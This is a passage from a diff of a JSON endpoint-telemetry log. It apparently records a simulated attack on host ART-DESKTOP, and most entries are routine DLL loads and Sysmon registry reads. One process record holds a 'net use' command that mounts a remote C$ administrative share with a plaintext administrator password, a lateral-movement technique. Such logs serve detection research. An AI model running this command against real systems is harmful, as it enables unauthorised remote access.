- "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "command_line": "net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6292, - "ppid": 7556, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "create", - "timestamp": 131883570909230000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}", - "unique_ppid": "{42FC7E13-CAE2-5C05-0000-001024194E01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\System32\\mpr.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "net.exe", - "image_path": "C:\\Windows\\System32\\net.exe", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 